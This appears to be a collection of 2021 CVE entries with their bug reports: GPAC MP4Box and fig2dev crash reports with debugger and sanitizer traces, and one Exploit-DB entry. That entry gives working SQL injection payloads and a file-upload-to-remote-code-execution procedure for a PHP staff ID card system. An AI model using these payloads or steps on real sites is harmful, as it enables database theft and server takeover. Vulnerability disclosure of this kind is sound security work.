A Segmentation fault caused by a null pointer dereference vulnerability exists in Gpac through 1.0.1 via the gf_avc_parse_nalu function in av_parsers.c when using mp4box, which causes a denial of service.

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...).

Hi, there.

There is a segmentation fault caused by nod in gf\_avc\_parse\_nalu, av\_parsers.c:6112 in commit 592ba26.

Here is my environment, compiler info and gpac version:

    Distributor ID:	Ubuntu
    Description:	Ubuntu 16.04.6 LTS
    Release:	16.04
    Codename:	xenial
    gcc: 5.4.0
    
    MP4Box - GPAC version 1.1.0-DEV-rev1170-g592ba26-master
    (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    	MINI build (encoders, decoders, audio and video output disabled)
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --static-bin --enable-debug
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG  GPAC_DISABLE_3D
    

To reproduce, run

POC:  
poc.zip  
(unzip first)

Program output:

    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] corrupted exp-golomb code, 32 leading zeros, max 31 allowed !
    [Core] corrupted exp-golomb code, 32 leading zeros, max 31 allowed !
    [Core] corrupted exp-golomb code, 32 leading zeros, max 31 allowed !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] corrupted exp-golomb code, 32 leading zeros, max 31 allowed !
    [Core] corrupted exp-golomb code, 32 leading zeros, max 31 allowed !
    [Core] corrupted exp-golomb code, 32 leading zeros, max 31 allowed !
    [Core] corrupted exp-golomb code, 32 leading zeros, max 31 allowed !
    [Core] corrupted exp-golomb code, 32 leading zeros, max 31 allowed !
    Segmentation fault (core dumped)
    

Here is the trace reported by gdb:

    Stopped reason: SIGSEGV
    gef➤  bt
    #0  0x0000000000bd0648 in gf_avc_parse_nalu (bs=<optimized out>, avc=0x24ae050) at /mnt/data/playground/gpac/src/media_tools/av_parsers.c:6112
    #1  0x000000000144109d in naludmx_parse_nal_avc (is_islice=<synthetic pointer>, is_slice=<synthetic pointer>, skip_nal=<synthetic pointer>, nal_type=0x4, size=0x3b, data=0x2491e67 "$1", ctx=0x24ada70) at /mnt/data/playground/gpac/src/filters/reframe_nalu.c:2348
    #2  naludmx_process (filter=0x24a0bd0) at /mnt/data/playground/gpac/src/filters/reframe_nalu.c:2874
    #3  0x0000000000fe4c18 in gf_filter_process_task (task=0x248d520) at /mnt/data/playground/gpac/src/filter_core/filter.c:2441
    #4  0x0000000000f7b909 in gf_fs_thread_proc (sess_thread=sess_thread@entry=0x248c2b0) at /mnt/data/playground/gpac/src/filter_core/filter_session.c:1640
    #5  0x0000000000f93558 in gf_fs_run (fsess=fsess@entry=0x248c220) at /mnt/data/playground/gpac/src/filter_core/filter_session.c:1877
    #6  0x0000000000c18b4b in gf_media_import (importer=importer@entry=0x7fffffff5bf0) at /mnt/data/playground/gpac/src/media_tools/media_import.c:1178
    #7  0x0000000000497345 in convert_file_info (inName=0x7fffffffe159 "tmp", trackID=0x0) at /mnt/data/playground/gpac/applications/mp4box/fileimport.c:128
    #8  0x0000000000456aaa in mp4boxMain (argc=<optimized out>, argv=<optimized out>) at /mnt/data/playground/gpac/applications/mp4box/main.c:5925
    #9  0x0000000001f06bb6 in generic_start_main ()
    #10 0x0000000001f071a5 in __libc_start_main ()
    #11 0x000000000041c4e9 in _start ()

CVE-2021-40565: Segmentation fault caused by null pointer dereference using mp4box in gf_avc_parse_nalu, av_parsers.c:6112 · Issue #1902 · gpac/gpac

A Segmentation fault caused by null pointer dereference vulnerability eists in Gpac through 1.0.2 via the avc_parse_slice function in av_parsers.c when using mp4box, which causes a denial of service.

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...).

Hi, there.

There is a segmentation fault caused by null pointer dereference in avc\_parse\_slice, av\_parsers.c:5678 in commit 592ba26.

Here is my environment, compiler info and gpac version:

    Distributor ID:	Ubuntu
    Description:	Ubuntu 16.04.6 LTS
    Release:	16.04
    Codename:	xenial
    gcc: 5.4.0
    
    MP4Box - GPAC version 1.1.0-DEV-rev1170-g592ba26-master
    (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    	MINI build (encoders, decoders, audio and video output disabled)
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --static-bin --enable-debug
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG  GPAC_DISABLE_3D
    

To reproduce, run

POC:  
poc.zip  
(unzip first)

Here is the trace reported by gdb:

    Stopped reason: SIGSEGV
    gef➤  bt
    #0  0x0000000000bcd59d in avc_parse_slice (svc_idr_flag=GF_FALSE, si=0x7fffffff5020, avc=0x24ae050, bs=0x248df40) at /mnt/data/playground/gpac/src/media_tools/av_parsers.c:5678
    #1  gf_avc_parse_nalu (bs=0x248df40, avc=0x24ae050) at /mnt/data/playground/gpac/src/media_tools/av_parsers.c:6087
    #2  0x000000000144109d in naludmx_parse_nal_avc (is_islice=<synthetic pointer>, is_slice=<synthetic pointer>, skip_nal=<synthetic pointer>, nal_type=0x4, size=0x4f, data=0x2491e5b "$1\200", ctx=0x24ada70) at /mnt/data/playground/gpac/src/filters/reframe_nalu.c:2348
    #3  naludmx_process (filter=0x24a0bd0) at /mnt/data/playground/gpac/src/filters/reframe_nalu.c:2874
    #4  0x0000000000fe4c18 in gf_filter_process_task (task=0x248d520) at /mnt/data/playground/gpac/src/filter_core/filter.c:2441
    #5  0x0000000000f7b909 in gf_fs_thread_proc (sess_thread=sess_thread@entry=0x248c2b0) at /mnt/data/playground/gpac/src/filter_core/filter_session.c:1640
    #6  0x0000000000f93558 in gf_fs_run (fsess=fsess@entry=0x248c220) at /mnt/data/playground/gpac/src/filter_core/filter_session.c:1877
    #7  0x0000000000c18b4b in gf_media_import (importer=importer@entry=0x7fffffff5bf0) at /mnt/data/playground/gpac/src/media_tools/media_import.c:1178
    #8  0x0000000000497345 in convert_file_info (inName=0x7fffffffe159 "tmp", trackID=0x0) at /mnt/data/playground/gpac/applications/mp4box/fileimport.c:128
    #9  0x0000000000456aaa in mp4boxMain (argc=<optimized out>, argv=<optimized out>) at /mnt/data/playground/gpac/applications/mp4box/main.c:5925
    #10 0x0000000001f06bb6 in generic_start_main ()
    #11 0x0000000001f071a5 in __libc_start_main ()
    #12 0x000000000041c4e9 in _start ()
    

The reason for this bug is that the program does not check the nullity of the pointer.  
![image](https://user-images.githubusercontent.com/7632714/130955606-eefd9dbd-049a-48b2-ab9f-fa46197e9d99.png)

CVE-2021-40564: Segmentation fault caused by null pointer dereference using mp4box in avc_parse_slice, av_parsers.c:5678 · Issue #1898 · gpac/gpac

A denial of service vulnerabiity exists in fig2dev through 3.28a due to a segfault in the open_stream function in readpics.c.

**System info**

Ubuntu 16.04 xenial, gcc (Ubuntu 5.5.0-12ubuntu1), fig2dev (latest master a4c6e1)

****Command line****

./fig2dev -L pdf -G .25:1cm -j -m 2 -N -P -x 3 -y 4 @@ /dev/null

**Output**

An open rectangle at line 14 - close it.
A rectangle with 5 corners at line 14 - convert to a polygon.
\[1\]    13064 segmentation fault  ~/AlphaFuzz-Experiment/projects/baseline0711/afl-fig2dev/fuzz\_bin/fig2dev -L

**AddressSanitizer output**

An open rectangle at line 14 - close it.
A rectangle with 5 corners at line 14 - convert to a polygon.
ASAN:SIGSEGV
\=================================================================
\==6829\==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000051a094 bp 0x7fff3739baa0 sp 0x7fff3739b8f0 T0)
    #0 0x51a093 in open\_stream /home/qiuhongjun/AlphaFuzz-Experiment/programs/programs-asan/fig2dev/fig2dev/dev/readpics.c:215
    #1 0x4b2aa8 in genps\_line /home/qiuhongjun/AlphaFuzz-Experiment/programs/programs-asan/fig2dev/fig2dev/dev/genps.c:1672
    #2 0x412a7d in gendev\_objects /home/qiuhongjun/AlphaFuzz-Experiment/programs/programs-asan/fig2dev/fig2dev/fig2dev.c:1008
    #3 0x411481 in main /home/qiuhongjun/AlphaFuzz-Experiment/programs/programs-asan/fig2dev/fig2dev/fig2dev.c:485
    #4 0x7f25954e683f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2083f)
    #5 0x4032f8 in \_start (/home/qiuhongjun/AlphaFuzz-Experiment/results/crashes-binary/gcc-asan/fig2dev/fig2dev+0x4032f8)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/qiuhongjun/AlphaFuzz-Experiment/programs/programs-asan/fig2dev/fig2dev/dev/readpics.c:215 open\_stream
\==6829\==ABORTING

CVE-2021-37530: Xfig / Tickets

A double-free vulnerability exists in fig2dev through 3.28a is affected by: via the free_stream function in readpics.c, which could cause a denial of service (context-dependent).

**System info**

Ubuntu 16.04 xenial, gcc (Ubuntu 5.5.0-12ubuntu1), fig2dev (latest master a4c6e1)

****Command line****

./fig2dev -L pdf -G .25:1cm -j -m 2 -N -P -x 3 -y 4 @@ /dev/null

**Output**

No such picture file: ../../fig2dev/ 0 0 675 0 675 375 0  0 0 5
\*\*\* Error in \`../../fig2dev': double free or corruption (!prev): 0x0000000000cfc030 \*\*\*
\======= Backtrace: \=========
/lib/x86\_64-linux-gnu/libc.so.6(+0x777f5)\[0x7f7fd7b6f7f5\]
/lib/x86\_64-linux-gnu/libc.so.6(+0x8038a)\[0x7f7fd7b7838a\]
/lib/x86\_64-linux-gnu/libc.so.6(cfree+0x4c)\[0x7f7fd7b7c58c\]
../../fig2dev\[0x4bbb2b\]
../../fig2dev\[0x47accd\]
../../fig2dev\[0x411b24\]
/lib/x86\_64-linux-gnu/libc.so.6(\_\_libc\_start\_main+0xf0)\[0x7f7fd7b18840\]
../../fig2dev\[0x402c09\]
\======= Memory map: \========
00400000\-004ec000 r-xp 00000000 08:11 27664590                           ../../fig2dev
006ec000-006ed000 r--p 000ec000 08:11 27664590                           ../../fig2dev
006ed000-00700000 rw-p 000ed000 08:11 27664590                           ../../fig2dev
00700000\-0071b000 rw-p 00000000 00:00 0
00cfb000-00d1c000 rw-p 00000000 00:00 0                                  \[heap\]
7f7fd0000000-7f7fd0021000 rw-p 00000000 00:00 0
7f7fd0021000-7f7fd4000000 ---p 00000000 00:00 0
7f7fd7579000-7f7fd7590000 r-xp 00000000 08:02 12582916                   /lib/x86\_64-linux-gnu/libgcc\_s.so.1
7f7fd7590000-7f7fd778f000 ---p 00017000 08:02 12582916                   /lib/x86\_64-linux-gnu/libgcc\_s.so.1
7f7fd778f000-7f7fd7790000 r--p 00016000 08:02 12582916                   /lib/x86\_64-linux-gnu/libgcc\_s.so.1
7f7fd7790000-7f7fd7791000 rw-p 00017000 08:02 12582916                   /lib/x86\_64-linux-gnu/libgcc\_s.so.1
7f7fd7791000-7f7fd7af8000 r--p 00000000 08:02 38010883                   /usr/lib/locale/locale-archive
7f7fd7af8000-7f7fd7cb8000 r-xp 00000000 08:02 12583571                   /lib/x86\_64-linux-gnu/libc-2.23.so
7f7fd7cb8000-7f7fd7eb8000 ---p 001c0000 08:02 12583571                   /lib/x86\_64-linux-gnu/libc-2.23.so
7f7fd7eb8000-7f7fd7ebc000 r--p 001c0000 08:02 12583571                   /lib/x86\_64-linux-gnu/libc-2.23.so
7f7fd7ebc000-7f7fd7ebe000 rw-p 001c4000 08:02 12583571                   /lib/x86\_64-linux-gnu/libc-2.23.so
7f7fd7ebe000-7f7fd7ec2000 rw-p 00000000 00:00 0
7f7fd7ec2000-7f7fd7fca000 r-xp 00000000 08:02 12583566                   /lib/x86\_64-linux-gnu/libm-2.23.so
7f7fd7fca000-7f7fd81c9000 ---p 00108000 08:02 12583566                   /lib/x86\_64-linux-gnu/libm-2.23.so
7f7fd81c9000-7f7fd81ca000 r--p 00107000 08:02 12583566                   /lib/x86\_64-linux-gnu/libm-2.23.so
7f7fd81ca000-7f7fd81cb000 rw-p 00108000 08:02 12583566                   /lib/x86\_64-linux-gnu/libm-2.23.so
7f7fd81cb000-7f7fd81e4000 r-xp 00000000 08:02 12583082                   /lib/x86\_64-linux-gnu/libz.so.1.2.8
7f7fd81e4000-7f7fd83e3000 ---p 00019000 08:02 12583082                   /lib/x86\_64-linux-gnu/libz.so.1.2.8
7f7fd83e3000-7f7fd83e4000 r--p 00018000 08:02 12583082                   /lib/x86\_64-linux-gnu/libz.so.1.2.8
7f7fd83e4000-7f7fd83e5000 rw-p 00019000 08:02 12583082                   /lib/x86\_64-linux-gnu/libz.so.1.2.8
7f7fd83e5000-7f7fd8409000 r-xp 00000000 08:02 12583492                   /lib/x86\_64-linux-gnu/libpng12.so.0.54.0
7f7fd8409000-7f7fd8608000 ---p 00024000 08:02 12583492                   /lib/x86\_64-linux-gnu/libpng12.so.0.54.0
7f7fd8608000-7f7fd8609000 r--p 00023000 08:02 12583492                   /lib/x86\_64-linux-gnu/libpng12.so.0.54.0
7f7fd8609000-7f7fd860a000 rw-p 00024000 08:02 12583492                   /lib/x86\_64-linux-gnu/libpng12.so.0.54.0
7f7fd860a000-7f7fd8630000 r-xp 00000000 08:02 12583562                   /lib/x86\_64-linux-gnu/ld-2.23.so
7f7fd87fb000-7f7fd8800000 rw-p 00000000 00:00 0
7f7fd882e000-7f7fd882f000 rw-p 00000000 00:00 0
7f7fd882f000-7f7fd8830000 r--p 00025000 08:02 12583562                   /lib/x86\_64-linux-gnu/ld-2.23.so
7f7fd8830000-7f7fd8831000 rw-p 00026000 08:02 12583562                   /lib/x86\_64-linux-gnu/ld-2.23.so
7f7fd8831000-7f7fd8832000 rw-p 00000000 00:00 0
7ffc8c5c7000-7ffc8c5e8000 rw-p 00000000 00:00 0                          \[stack\]
7ffc8c5ec000-7ffc8c5ee000 r--p 00000000 00:00 0                          \[vvar\]
7ffc8c5ee000-7ffc8c5f0000 r-xp 00000000 00:00 0                          \[vdso\]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  \[vsyscall\]
\[1\]    32228 abort      ../../fig2dev -L

**AddressSanitizer output**

No such picture file: ../../fig2dev/ 0 0 675 0 675 375 0  0 0 5
\=================================================================
\==28522\==ERROR: AddressSanitizer: attempting double-free on 0x610000007d40 in thread T0:
    #0 0x7f58f241532a in \_\_interceptor\_free (/usr/lib/x86\_64-linux-gnu/libasan.so.2+0x9832a)
    #1 0x519594 in free\_stream ../../fig2dev/fig2dev/dev/readpics.c:62
    #2 0x4b2b32 in genps\_line ../../fig2dev/fig2dev/dev/genps.c:1674
    #3 0x412a7d in gendev\_objects ../../fig2dev/fig2dev/fig2dev.c:1008
    #4 0x411481 in main ../../fig2dev/fig2dev/fig2dev.c:485
    #5 0x7f58f188b83f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2083f)
    #6 0x4032f8 in \_start (/home/qiuhongjun/AlphaFuzz-Experiment/results/crashes-binary/gcc-asan/fig2dev/fig2dev+0x4032f8)

0x610000007d40 is located 0 bytes inside of 180\-byte region \[0x610000007d40,0x610000007df4)
freed by thread T0 here:
    #0 0x7f58f241532a in \_\_interceptor\_free (/usr/lib/x86\_64-linux-gnu/libasan.so.2+0x9832a)
    #1 0x519594 in free\_stream ../../fig2dev/fig2dev/dev/readpics.c:62
    #2 0x51a022 in open\_stream ../../fig2dev/fig2dev/dev/readpics.c:211
    #3 0x4b2aa8 in genps\_line ../../fig2dev/fig2dev/dev/genps.c:1672
    #4 0x412a7d in gendev\_objects ../../fig2dev/fig2dev/fig2dev.c:1008
    #5 0x411481 in main ../../fig2dev/fig2dev/fig2dev.c:485
    #6 0x7f58f188b83f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2083f)

previously allocated by thread T0 here:
    #0 0x7f58f2415662 in malloc (/usr/lib/x86\_64-linux-gnu/libasan.so.2+0x98662)
    #1 0x519f58 in open\_stream ../../fig2dev/fig2dev/dev/readpics.c:199
    #2 0x4b2aa8 in genps\_line ../../fig2dev/fig2dev/dev/genps.c:1672
    #3 0x412a7d in gendev\_objects ../../fig2dev/fig2dev/fig2dev.c:1008
    #4 0x411481 in main ../../fig2dev/fig2dev/fig2dev.c:485
    #5 0x7f58f188b83f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2083f)

SUMMARY: AddressSanitizer: double-free ??:0 \_\_interceptor\_free
\==28522\==ABORTING

CVE-2021-37529: Xfig / Tickets

A null pointer deference vulnerability exists in gpac through 1.0.1 via the naludmx_parse_nal_avc function in reframe_nalu, which allows a denail of service.

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...).

Hi, there.

There is a segmentation fault caused by null pointer dereference in naludmx\_parse\_nal\_avc, reframe\_nalu.c:2474 in commit 592ba26.

Here is my environment, compiler info and gpac version:

    Distributor ID:	Ubuntu
    Description:	Ubuntu 16.04.6 LTS
    Release:	16.04
    Codename:	xenial
    gcc: 5.4.0
    
    MP4Box - GPAC version 1.1.0-DEV-rev1170-g592ba26-master
    (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    	MINI build (encoders, decoders, audio and video output disabled)
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --static-bin --enable-debug
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG  GPAC_DISABLE_3D
    

To reproduce, run

POC:  
poc.zip  
(unzip first)

Here is the trace reported by gdb:

    #0  0x00000000008ac435 in naludmx_parse_nal_avc (ctx=0x1259a80, data=0x1239f73 "tr\372!", size=0xe, nal_type=0x14, skip_nal=0x7fffffff4fc4, is_slice=0x7fffffff4fd0, is_islice=0x7fffffff4fd4) at /mnt/data/playground/gpac/src/filters/reframe_nalu.c:2474
    #1  0x00000000008ad7d3 in naludmx_process (filter=0x124cbe0) at /mnt/data/playground/gpac/src/filters/reframe_nalu.c:2874
    #2  0x00000000007480a0 in gf_filter_process_task (task=0x123eee0) at /mnt/data/playground/gpac/src/filter_core/filter.c:2441
    #3  0x000000000073798c in gf_fs_thread_proc (sess_thread=0x12382e0) at /mnt/data/playground/gpac/src/filter_core/filter_session.c:1640
    #4  0x0000000000738305 in gf_fs_run (fsess=0x1238250) at /mnt/data/playground/gpac/src/filter_core/filter_session.c:1877
    #5  0x00000000006571ea in gf_media_import (importer=0x7fffffff5bf0) at /mnt/data/playground/gpac/src/media_tools/media_import.c:1178
    #6  0x000000000042cdf9 in convert_file_info (inName=0x7fffffffe163 "tmp", trackID=0x0) at /mnt/data/playground/gpac/applications/mp4box/fileimport.c:128
    #7  0x00000000004168c3 in mp4boxMain (argc=0x7, argv=0x7fffffffddb8) at /mnt/data/playground/gpac/applications/mp4box/main.c:5925
    #8  0x0000000000418d6b in main (argc=0x7, argv=0x7fffffffddb8) at /mnt/data/playground/gpac/applications/mp4box/main.c:6455
    #9  0x0000000000caaa06 in generic_start_main ()
    #10 0x0000000000caaff5 in __libc_start_main ()
    #11 0x0000000000403f39 in _start ()

CVE-2021-40559: Segmentation fault casued by null pointer dereference using mp4box in naludmx_parse_nal_avc, reframe_nalu.c:2474 · Issue #1886 · gpac/gpac

A heap-based buffer overflow vulnerability exists in GPAC v1.0.1 in the gf_isom_dovi_config_get function in MP4Box, which causes a denial of service or execute arbitrary code via a crafted file.

Hello,  
A heap-buffer-overflow has occurred in function gf\_isom\_dovi\_config\_get of isomedia/avc\_ext.c:2435 when running program MP4Box,this can reproduce on the lattest commit.  
System info：  
Ubuntu 20.04.1 : clang 10.0.0 , gcc 9.3.0

poc\_heap.zip

Verification steps：  
1.Get the source code of gpac  
2.Compile

    cd gpac-master
    CC=gcc CXX=g++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" ./configure
    make
    

3.run MP4Box

command line

    [iso file] Unknown box type esJs in parent enca
    [iso file] Unknown box type stts in parent enca
    [iso file] Box "enca" (start 1455) has 5 extra bytes
    [iso file] Box "enca" is larger than container box
    [iso file] Box "stsd" size 171 (start 1439) invalid (read 192)
    * Movie Info *
    	Timescale 90000 - 2 tracks
    Segmentation fault
    
    

asan info

    =================================================================
    ==1042542==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x610000000130 at pc 0x7fc6ede92514 bp 0x7ffcfced6850 sp 0x7ffcfced6840
    READ of size 8 at 0x610000000130 thread T0
        #0 0x7fc6ede92513 in gf_isom_dovi_config_get isomedia/avc_ext.c:2435
        #1 0x7fc6ee2fec1e in gf_media_get_rfc_6381_codec_name media_tools/isom_tools.c:4207
        #2 0x558b1bf03ac5 in DumpTrackInfo /home.../gpac/gpac-master/applications/mp4box/filedump.c:3442
        #3 0x558b1bf18f44 in DumpMovieInfo /home.../gpac/gpac-master/applications/mp4box/filedump.c:3777
        #4 0x558b1bed571d in mp4boxMain /home.../gpac/gpac-master/applications/mp4box/main.c:5991
        #5 0x7fc6ed2390b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #6 0x558b1be77f1d in _start (/home.../gpac/gpac-master/bin/gcc/MP4Boxfl+0x48f1d)
    
    Address 0x610000000130 is a wild pointer.
    SUMMARY: AddressSanitizer: heap-buffer-overflow isomedia/avc_ext.c:2435 in gf_isom_dovi_config_get
    Shadow bytes around the buggy address:
      0x0c207fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c207fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c207fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c207fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c207fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c207fff8020: fa fa fa fa fa fa[fa]fa fa fa fa fa fa fa fa fa
      0x0c207fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c207fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c207fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c207fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c207fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==1042542==ABORTING
    

source code

    2428 GF_DOVIDecoderConfigurationRecord *gf_isom_dovi_config_get(GF_ISOFile* the_file, u32 trackNumber, u32 DescriptionIndex)
    2429 {
    2430 	GF_TrackBox* trak;
    2431 	GF_MPEGVisualSampleEntryBox *entry;
    2432 	trak = gf_isom_get_track_from_file(the_file, trackNumber);
    2433 	if (!trak || !trak->Media || !DescriptionIndex) return NULL;
    2434 	entry = (GF_MPEGVisualSampleEntryBox*)gf_list_get(trak->Media->information->sampleTable->SampleDescription->child_boxes, DescriptionIndex - 1);
    2435 	if (!entry || !entry->dovi_config) return NULL;
    2436 	return DOVI_DuplicateConfig(&entry->dovi_config->DOVIConfig);
    2437 }

CVE-2021-36417: A heap-buffer-overflow has occurred in function gf_isom_dovi_config_get · Issue #1846 · gpac/gpac

In Sourcecodetester Printable Staff ID Card Creator System 1.0 after compromising the database via SQLi, an attacker can log in and leverage an arbitrary file upload vulnerability to obtain remote code execution.

    # Exploit Title: Printable Staff ID Card Creator System 1.0 - SQLi & RCE via Arbitrary File Upload
    # Date: 2021-05-16
    # Exploit Author : bwnz
    # Software Link: https://www.sourcecodester.com/php/12802/php-staff-id-card-creation-and-printing-system.html
    # Version: 1.0
    # Tested on: Ubuntu 20.04.2 LTS
    
    # Printable Staff ID Card Creator System is vulnerable to an unauthenticated SQL Injection attack.
    # After compromising the database via SQLi, an attacker can log in and leverage an arbitrary file upload
    # vulnerability to obtain remote code execution.
    
    
    -----SQL Injection-----
    Step 1.) Navigate to the login page and populate the email and password fields.
    Step 2.) With Burp Suite running, send and capture the request.
    Step 3.) Within Burp Suite, right click and "Save item" in preparation for putting the request through SQLMap.
    Step 4.) Open a terminal and run the following command:
    	sqlmap -r <saved item>
    
    Below are the SQLMap results
    
    Parameter: user_email (POST)
       	 Type: boolean-based blind
        Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
        Payload: user_email=test@test.com' RLIKE (SELECT (CASE WHEN (9007=9007) THEN 0x7465737440746573742e636f6d ELSE 0x28 END))-- JaaE&password=`&login_button=
    
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: user_email=test@test.com' AND (SELECT 7267 FROM(SELECT COUNT(*),CONCAT(0x7176717071,(SELECT (ELT(7267=7267,1))),0x7162716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- pCej&password=`&login_button=
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: user_email=test@test.com' AND (SELECT 2884 FROM (SELECT(SLEEP(5)))KezZ)-- bBqz&password=`&login_button=
    ----- END -----
    
    
    ----- Authenticated RCE via Arbitrary File Upload -----
    # For this attack,  it is assumed that you've obtained credentials via the SQL Injection attack above and have logged in.
    
    Step 1.) After logging in, click the "Initialization" option and "Add System Info".
    Step 2.) Populate the blank form with arbitrary data. At the bottom of the form, there is an option to upload a logo. Upload your evil.php file here and click "Finish".
    Step 3.) By default, the file is uploaded to http://<IP>/Staff_registration/media/evil.php. Navigate to it for RCE.
    ----- END ------

CVE-2021-45411: Offensive Security’s Exploit Database Archive

A heab-based buffer overflow vulnerability exists in MP4Box in GPAC 1.0.1 via media.c, which allows attackers to cause a denial of service or execute arbitrary code via a crafted file.

Hello,  
A heap-buffer-overflow has occurred when running program MP4Box,which leads to a Deny of Service caused by dividing zero without sanity check,this can reproduce on the lattest commit.  
System info：  
Ubuntu 20.04.1 : clang 10.0.0 , gcc 9.3.0

poc.zip

file: media.c  
function:gf\_isom\_get\_3gpp\_audio\_esd  
line: 105  
As below code shows:

    97		gf_bs_write_data(bs, "\x41\x6D\x7F\x5E\x15\xB1\xD0\x11\xBA\x91\x00\x80\x5F\xB4\xB9\x7E", 16);
    98		gf_bs_write_u16_le(bs, 1);
    99		memset(szName, 0, 80);
    100		strcpy(szName, "QCELP-13K(GPAC-emulated)");
    101		gf_bs_write_data(bs, szName, 80);
    102		ent = &stbl->TimeToSample->entries[0];
    103		sample_rate = entry->samplerate_hi;
    104		block_size = ent ? ent->sampleDelta : 160;
    105		gf_bs_write_u16_le(bs, 8*sample_size*sample_rate/block_size);      <------ block_size can be zero
    106		gf_bs_write_u16_le(bs, sample_size);
    107		gf_bs_write_u16_le(bs, block_size);
    108		gf_bs_write_u16_le(bs, sample_rate);
    109		gf_bs_write_u16_le(bs, entry->bitspersample);
    110		gf_bs_write_u32_le(bs, sample_size ? 0 : 7);
    

Verification steps：  
1.Get the source code of gpac  
2.Compile

    cd gpac-master
    CC=gcc CXX=g++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" ./configure
    make
    

3.run MP4Box

    ./MP4Box -hint poc -out /dev/null
    

In Command line:

    [iso file] Unknown box type esJs in parent enca
    [iso file] Unknown box type stts in parent enca
    [iso file] Box "enca" (start 1455) has 5 extra bytes
    [iso file] Box "enca" is larger than container box
